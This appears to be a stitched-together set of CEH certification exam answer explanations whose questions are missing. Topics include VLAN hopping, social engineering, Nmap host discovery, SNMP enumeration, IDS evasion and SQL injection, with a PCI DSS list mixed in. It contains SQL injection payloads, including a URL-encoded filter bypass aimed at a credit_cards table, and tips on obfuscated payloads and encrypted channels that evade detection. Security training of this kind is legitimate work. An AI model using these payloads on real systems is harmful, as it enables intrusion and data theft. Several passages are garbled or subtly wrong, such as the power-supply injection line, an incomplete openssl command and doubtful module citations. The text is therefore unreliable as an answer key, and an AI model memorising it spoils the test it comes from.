The longer an adversary has this level of access, the greater the impact. Defenders must detect this stage as quickly as possible and deploy tools which can enable them to gather forensic evidence. One example would come with network packet captures, for damage assessment. Only now, after progressing through the primary six phases, can intruders take actions to realize their original objectives. Typically, the target of knowledge exfiltration involves collecting, encrypting and extracting information from the victim(s) environment; violations of knowledge integrity or availability are potential objectives also . Alternatively, and most ordinarily , the intruder may only desire access to the initial victim box to be used as a hop point to compromise additional systems and move laterally inside the network. Once this stage is identified within an environment, the implementation of prepared reaction plans must be initiated. At a minimum, the plan should include a comprehensive communication plan, detailed evidence must be elevated to the very best ranking official or board , the deployment of end-point security tools to dam data loss and preparation for briefing a CIRT Team. Having these resources well established beforehand may be a “MUST” in today’s quickly evolving landscape of cybersecurity threats

VLAN hopping is an advanced attack technique described in CEH materials, used to bypass VLAN segmentation by exploiting switch misconfigurations or vulnerabilities. Two primary methods—switch spoofing and double tagging—allow attackers to gain access to traffic from VLANs they are not authorized to view. This technique enables the capture of inter-VLAN traffic without requiring administrative privileges or triggering security tools. Port mirroring requires administrative control and is not an attack method. Rogue DHCP servers target IP assignment, not VLAN segmentation. ARP poisoning is effective only within a single broadcast domain and cannot traverse VLAN boundaries. Because the objective is to silently access multiple VLANs despite enforced segmentation, VLAN hopping is the correct technique as per CEH’s network perimeter attack methodology.

This scenario represents a classic baiting attack, a social engineering technique explicitly described in CEH v13 Social Engineering. In baiting, attackers exploit human curiosity or greed by leaving behind a malicious physical device—most commonly a USB drive—with an enticing label. When the victim plugs the device into a system, malware is automatically executed, leading to compromise.

Option A precisely captures this behavior. The label “Employee Salary Info 2024” is intentionally designed to entice the victim into interacting with the device. CEH v13 highlights USB baiting as particularly dangerous because it bypasses technical controls and relies solely on human behavior.

Option B describes pretexting, which involves impersonation. Option C refers to dumpster diving. Option D describes tailgating, a physical access attack. None of these match the USB-based lure described.

CEH v13 emphasizes that baiting attacks are highly effective in corporate environments and recommends strong security awareness training and disabling USB autorun features as mitigation.

If a system stores passwords in weak or reversible formats, attackers can perform offline cracking. CEH emphasizes dictionary attacks as the fastest and most efficient method to exploit weak hashing practices. This avoids detection and leverages known password patterns to recover plaintext credentials.

These types of attacks occur when faults or glitches are INJECTED into the Power supply that can be used for remote execution.

Cryptcat enables us to communicate between two systems and encrypts the communication between them with twofish, one of many excellent encryption algorithms from Bruce Schneier et al. Twofish’s encryption is on par with AES encryption, making it nearly bulletproof. In this way, the IDS can’t detect the malicious behavior taking place even when its traveling across normal HTTP ports like 80 and 443.

Comprehensive and Detailed Explanation:

The OpenSSL command-line utility s_client is used to test SSL/TLS connections.

Correct syntax:

openssl s_client -connect

This command will initiate a TLS connection to port 443 on the given domain and allow you to inspect certificates, cipher suites, and server responses.

From CEH v13 Courseware:

Module 12: Cryptography → SSL/TLS Testing Tools

Comprehensive and Detailed Explanation:

The Snort rule syntax:

alert tcp any any → 192.168.1.0/24 111

This means: Alert on TCP traffic from any IP and any port, going to any host in the 192.168.1.0/24 subnet on destination port 111.

The content "|00 01 86 a5|" identifies a mountd access signature pattern.

Port 111 is used by SunRPC (commonly associated with mountd in UNIX environments).

From CEH v13 Courseware:

Module 13: IDS, Firewalls and Honeypots → Understanding Snort Rules

This scenario describes SNMP Enumeration, a technique covered under CEH v13 Reconnaissance and Enumeration. Simple Network Management Protocol (SNMP) operates over UDP port 161 and is widely used for monitoring and managing network devices. A common and critical weakness arises when organizations leave default or publicly known community strings such as public (read-only) or private (read-write) unchanged.

CEH v13 explains that when an SNMP agent is configured with default community strings, it allows unauthenticated or weakly authenticated queries, enabling attackers to retrieve extensive system information. This includes installed software, running processes, system descriptions, network interfaces, and routing tables. The ability to perform bulk data queries using SNMP GET and WALK commands makes enumeration highly effective and fast.

Option B correctly identifies the root cause: misconfigured SNMP agents permitting anonymous or default access. The other options are incorrect because SNMP does not rely on FTP, registry access, or trap logging for enumeration. Traps (Option D) are unsolicited notifications sent to managers and are not used for querying system details.

CEH v13 strongly recommends disabling SNMP when not required, changing default community strings, restricting SNMP access via ACLs, and using SNMPv3, which supports authentication and encryption. Therefore, Option B is the correct and CEH-aligned answer.

This describes a rule-based or logic-based password attack, which CEH v13 classifies as a smart, targeted guessing technique. Attackers use known patterns—such as naming conventions, dates, or personal interests—to reduce the keyspace and increase success rates.

Option A accurately reflects this methodology. Option B is brute force, which is random and exhaustive. Option C is physical observation. Option D describes hybrid attacks without structured logic.

CEH v13 emphasizes that pattern-based attacks are highly effective when attackers possess prior intelligence. Therefore, Option A is correct.

SQL Injection is a type of attack that exploits a vulnerability in a web application that uses a SQL database. The attacker injects malicious SQL code into the user input, such as a login form, that is then executed by the database server. This can allow the attacker to access, modify, or delete data, or execute commands on the database server.

The ‘UNION’ SQL keyword is often used in SQL Injection attacks to combine the results of two or more SELECT statements into a single result set. This can allow the attacker to retrieve additional data from other tables or columns that are not intended to be displayed by the application. For example, if the application uses the following query to check the user credentials:

SELECT * FROM users WHERE username = '$username' AND password = '$password'

The attacker can inject a ‘UNION’ statement to append another query, such as:

' OR 1 = 1 UNION SELECT * FROM credit_cards --

This will result in the following query being executed by the database server:

SELECT * FROM users WHERE username = '' OR 1 = 1 UNION SELECT * FROM credit_cards --' AND password = '$password'

The first part of the query will always return true, and the second part of the query will return the data from the credit_cards table. The ‘–’ symbol is a comment that will ignore the rest of the query. The attacker can then see the credit card information in the application’s response.

However, some web applications implement security measures to prevent SQL Injection attacks, such as filtering special characters in user inputs. Special characters are symbols that have a special meaning in SQL, such as quotes, semicolons, dashes, etc. By filtering or escaping these characters, the application can prevent the attacker from injecting malicious SQL code. For example, if the application replaces single quotes with two single quotes, the previous injection attempt will fail, as the query will become:

SELECT * FROM users WHERE username = '''' OR 1 = 1 UNION SELECT * FROM credit_cards --'' AND password = '$password'

This will result in a syntax error, as the query is not valid SQL.

In this challenging environment, if the hacker still intends to exploit this SQL Injection vulnerability, the strategy that he is most likely to employ is to bypass the special character filter by encoding his malicious input. Encoding is a process of transforming data into a different format, such as hexadecimal, base64, URL, etc. By encoding his input, the hacker can avoid the filter and still inject malicious SQL code. For example, if the hacker encodes his input using URL encoding, the previous injection attempt will become:

%27%20OR%201%20%3D%201%20UNION%20SELECT%20*%20FROM%20credit_cards%20--

This will result in the following query being executed by the database server, after the application decodes the input:

SELECT * FROM users WHERE username = '' OR 1 = 1 UNION SELECT * FROM credit_cards --' AND password = '$password'

This will succeed in returning the credit card information, as the filter will not detect the special characters in the encoded input.

Therefore, the hacker is most likely to employ the strategy of bypassing the special character filter by encoding his malicious input, which could potentially enable him to successfully inject damaging SQL queries.

Once initial access is obtained—especially through weak or default credentials—the CEH system hacking methodology directs the tester to proceed to privilege escalation. The objective is to elevate user-level access to administrative or system-level privileges so the attacker can perform unrestricted actions such as installing tools, modifying configurations, accessing protected files, and pivoting laterally. CEH materials emphasize using privilege escalation vulnerabilities, such as misconfigured services, kernel exploits, unpatched local privilege escalation flaws, weak file permissions, and token impersonation. A denial-of-service attack is counterproductive and does not support post-exploitation goals. XSS is a web application attack vector and unrelated to operating system privilege manipulation. Brute-forcing the root password is noisy, slow, and unnecessary when authenticated access is already established. Therefore, exploiting a known local privilege escalation vulnerability is the appropriate CEH-aligned next step.

Brute-force attack when an attacker uses a set of predefined values to attack a target and analyze the response until he succeeds. Success depends on the set of predefined values. It will take more time if it is larger, but there is a better probability of success. In a traditional brute-force attack, the passcode or password is incrementally increased by one letter/number each time until the right passcode/password is found.

The CEH Mobile Platform Security module explains that mobile antivirus solutions rely heavily on signatures and known exploit patterns. A custom exploit with obfuscation is far more likely to bypass detection.

CEH explicitly teaches that:

Zero-day or unpatched vulnerabilities

Custom, obfuscated payloads

Minimal use of known frameworks

are the most effective for bypassing endpoint defenses during controlled testing.

Option A is correct.

Options B and C are easily detected.

Option D is social engineering, not a technical exploit.

Weaknesses of LM hashes include:

A. Passwords are converted to uppercase before hashing.

B. In older Windows systems, LM hashes were transmitted over the network, sometimes in plaintext (or easily intercepted).

D. Passwords are split into two 7-character chunks, which are hashed independently, reducing entropy.

From CEH v13 Courseware:

Module 6: Malware and Password Threats

Module 4: Windows Enumeration

Incorrect Option:

C: LM uses DES encryption with 56-bit keys (not 32-bit).

In CEH v13 Module 03: Scanning Networks, under the Nmap Host Discovery Techniques, TCP SYN ping scan is explained as one of the methods used to determine whether a host is online by sending SYN packets to specified TCP ports.

When using Nmap:

-PS specifies a TCP SYN ping scan. It sends SYN packets to a given port (by default port 80, unless specified) to check whether a host is up and whether the port is open.

The response type to this SYN packet determines the host status:

If a SYN/ACK is received, it indicates the port is open, and the host is up.

If RST is received, the port is closed, but the host is still considered online.

If no response or ICMP unreachable is received, the host may be down or filtered.

Clarification of options:

A. -pp: This is not a valid Nmap option.

B. -PO: This sends IP Protocol Ping, used less frequently and not the same as SYN ping.

C. -PS: Correct. Performs a TCP SYN Ping Scan.

D. -PA: Sends TCP ACK Ping, used to determine firewall presence but not the same as SYN scan.

Reference from CEH v13 Study Guide and Course Material:

CEH v13 Official Module 03 – Scanning Networks, Slide: Nmap Host Discovery Techniques

EC-Council iLabs - Scanning Networks Practical Lab Guide: Section on nmap -sn -PS

Nmap Official Documentation (also referenced in CEH):

The Certified Ethical Hacker (CEH) Social Engineering module defines tailgating as a physical social engineering attack where an unauthorized person follows an authorized individual into a restricted area.

Option C precisely matches CEH’s definition.

Option A is pretexting.

Option B is baiting.

Option D is phishing.

CEH stresses physical security awareness as critical as cyber defenses.

This is a classic phishing scam — a form of social engineering used to trick victims into giving up sensitive information.

Statement D is incorrect because:

Antivirus, anti-spyware, and firewalls are primarily designed to stop malware and network intrusions.

They cannot reliably detect social engineering attacks like phishing emails, especially if the email content appears legitimate.

Detection of phishing is more reliant on user awareness and email filtering policies.

From CEH v13 Courseware:

Module 7: Social Engineering

Module 5: Email Security

CEH v13 Study Guide states:

“Phishing attacks are psychological rather than purely technical. Antivirus tools cannot detect or prevent all phishing attempts because these are based on user manipulation rather than system compromise.”

Build and Maintain a Secure Network

1. Install and maintain a firewall configuration to protect cardholder data.

2. Do not use vendor-supplied defaults for system passwords and other security parameters.

Protect Cardholder Data

3. Protect stored cardholder data.

4. Encrypt transmission of cardholder data across open, public networks.

Maintain a Vulnerability Management Program

5. Use and regularly update anti-virus software or programs.

6. Develop and maintain secure systems and applications.

Implement Strong Access Control Measures

7. Restrict access to cardholder data by business need-to-know.

8. Assign a unique ID to each person with computer access.

9. Restrict physical access to cardholder data.

Regularly Monitor and Test Networks

10. Track and monitor all access to network resources and cardholder data.

11. Regularly test security systems and processes.

Maintain an Information Security Policy

12. Maintain a policy that addresses information security for employees and contractors.

CEH v13 explains that IDS systems are often tuned to detect active scanning behavior, especially port scans and TCP/UDP probing that generate recognizable signatures. The command nmap -sn -PE performs a pure ICMP Echo Request ping sweep without sending any TCP SYN, UDP probes, or other packets normally associated with port enumeration. Since this mode disables port scanning entirely, it produces minimal traffic that resembles legitimate network behavior. CEH emphasizes that many networks allow ICMP Echo traffic internally for diagnostics, so such pings may not be treated as suspicious unless rate thresholds are exceeded. Because the tester avoided SYN packets, ACK probes, and UDP scans, the IDS saw no malicious pattern or connection attempts. The effectiveness of this technique is highlighted in CEH under passive and stealth reconnaissance, where minimal interaction is used to avoid detection. Thus, the scan succeeded because it relied solely on ICMP host discovery, not port scanning.

The host discovery technique that the tester should use is TCP SYN Ping Scan. This technique sends a TCP SYN packet to a specified port on the target host and waits for a response. If the host responds with a TCP SYN/ACK packet, it means the host is alive and the port is open. If the host responds with a TCP RST packet, it means the host is alive but the port is closed. If the host does not respond at all, it means the host is either dead or filtered by a firewall12. TCP SYN Ping Scan can bypass firewall restrictions because it mimics the initial stage of a TCP three-way handshake, which is a common and legitimate network activity. Therefore, most firewalls will allow TCP SYN packets to pass through and reach the target host, unless they are configured to block specific ports or IP addresses3. TCP SYN Ping Scan can also accurately identify live systems because it does not rely on ICMP, which may be blocked or rate-limited by some firewalls or routers.

The other options are not as effective or feasible as TCP SYN Ping Scan for the following reasons:

A. UDP Ping Scan: This technique sends a UDP packet to a specified port on the target host and waits for a response. If the host responds with an ICMP Port Unreachable message, it means the host is alive but the port is closed. If the host does not respond at all, it means the host is either dead, the port is open, or the packet is filtered by a firewall12. UDP Ping Scan may not bypass firewall restrictions because some firewalls may block or drop UDP packets, especially if they are sent to uncommon or reserved ports. UDP Ping Scan may also not accurately identify live systems because it cannot distinguish between open ports and filtered packets, and it may generate false positives or negatives due to packet loss or rate-limiting.

B. ICMP ECHO Ping Scan: This technique sends an ICMP ECHO Request packet to the target host and waits for an ICMP ECHO Reply packet. If the host responds with an ICMP ECHO Reply packet, it means the host is alive. If the host does not respond at all, it means the host is either dead or filtered by a firewall12. ICMP ECHO Ping Scan may not bypass firewall restrictions because some firewalls may block or drop ICMP packets, especially if they are sent to prevent ping sweeps or denial-of-service attacks. ICMP ECHO Ping Scan may also not accurately identify live systems because it may generate false positives or negatives due to packet loss or rate-limiting.

C. ICMP Timestamp Ping Scan: This technique sends an ICMP Timestamp Request packet to the target host and waits for an ICMP Timestamp Reply packet. If the host responds with an ICMP Timestamp Reply packet, it means the host is alive. If the host does not respond at all, it means the host is either dead or filtered by a firewall12. ICMP Timestamp Ping Scan may not bypass firewall restrictions because some firewalls may block or drop ICMP packets, especially if they are sent to prevent ping sweeps or denial-of-service attacks. ICMP Timestamp Ping Scan may also not accurately identify live systems because it may generate false positives or negatives due to packet loss or rate-limiting.

If the token itself (e.g., hardware key or smartcard) performs offline verification of the PIN, it can be physically attacked. An attacker can:

Steal the token

Try all possible PIN combinations (0000–9999)

Bypass limits if no lockout mechanisms exist

This is a brute-force attack — the attacker tries every combination until the correct one is found.

From CEH v13 Courseware:

Module 6: Malware and Authentication

Module 20: Identity and Access Management

Incorrect Options:

A: Birthday attacks are related to hash collisions.

C: MITM involves intercepting communication, not offline brute-force.

D: Smurf is a DoS attack, not related to token/PIN systems.

CEH v13 explains that ARP poisoning (also known as ARP spoofing) occurs when an attacker sends forged ARP replies across the network to associate their MAC address with multiple IP addresses, tricking hosts into sending traffic through the attacker’s machine. This results in routing inconsistencies, intermittent connectivity, failed logins, and degraded intranet performance—exactly the symptoms described. ARP poisoning typically involves unsolicited ARP replies, which overwrite legitimate ARP cache entries. CEH emphasizes that ARP-based attacks are common on LANs because ARP lacks authentication, allowing attackers to impersonate gateways or key hosts. DHCP snooping misconfigurations (Option B) affect IP allocation, not ARP mappings. Legitimate ARP refreshes (Option C) are request-based and do not involve flooding unsolicited replies. Port security restrictions (Option D) block MAC anomalies, not create them. Therefore, ARP poisoning is the correct root cause.

CEH v13 details that fragmentation attacks are a common IDS evasion strategy. Signature-based IDS systems depend on reassembling packets to detect malicious patterns. When attackers fragment TCP headers into smaller segments, the IDS may be unable to reconstruct the original packet sequence, especially if the fragments are intentionally crafted to confuse reassembly buffers. Meanwhile, the target host typically recombines the fragments correctly, allowing the scan or payload to pass undetected. This technique is specifically discussed under IDS evasion methods, where fragmentation prevents complete packet inspection. Options A and B describe unrelated evasion mechanisms such as IP spoofing and MAC spoofing, and Option C does not fundamentally affect IDS reconstruction. The tester is clearly using packet fragmentation to evade detection while still mapping open ports successfully.

According to CEH v13 Social Engineering, social engineering attacks manipulate human trust rather than technical vulnerabilities. Option A describes a classic pretexting attack, where the attacker impersonates IT staff and fabricates a false issue to trick a victim into revealing credentials.

This scenario aligns perfectly with CEH definitions because:

The attacker relies on authority impersonation

The victim is socially manipulated

No technical exploitation is required

Option B is a legitimate security activity.

Option C is accidental malware introduction, not social engineering.

Option D is physical negligence exploitation, not direct social engineering interaction.

CEH v13 stresses that pretexting attacks are extremely effective against new employees who lack familiarity with procedures. Therefore, Option A is correct.

This scenario precisely matches Time-Based Blind SQL Injection, a technique detailed in CEH v13 Web Application Hacking. When applications suppress error messages and sanitize outputs, attackers rely on response timing to infer whether injected SQL statements are executed.

In time-based SQL injection, the attacker injects database-specific delay functions (such as WAITFOR DELAY, DBMS_LOCK.SLEEP, or SLEEP()). If the injected condition is true, the database pauses execution, causing a noticeable delay.

The key indicators described—no visible output but increased response time—are classic signs of time-based SQL injection. CEH v13 explains that this method is particularly useful when:

Errors are hidden

UNION queries fail

Output is not reflected

Union-based and out-of-band SQL injections require data exfiltration channels or visible outputs, which are absent here. “Heavy query-based” is not a formal CEH classification.

Thus, Option A is the correct answer.

A salt is random data that is used as an additional input to a one-way function that hashes data, a password, or passphrase. Salts are used to safeguard passwords in storage. Historically a password was stored in plaintext on a system, but over time additional safeguards were developed to protect a user's password against being read from the system. A salt is one of those methods.

A new salt is randomly generated for each password. In a typical setting, the salt and the password (or its version after key stretching) are concatenated and processed with a cryptographic hash function, and the output hash value (but not the original password) is stored with the salt in a database. Hashing allows for later authentication without keeping and therefore risking exposure of the plaintext password in the event that the authentication data store is compromised.

Salts defend against a pre-computed hash attack, e.g. rainbow tables. Since salts do not have to be memorized by humans they can make the size of the hash table required for a successful attack prohibitively large without placing a burden on the users. Since salts are different in each case, they also protect commonly used passwords, or those users who use the same password on several sites, by making all salted hash instances for the same password different from each other.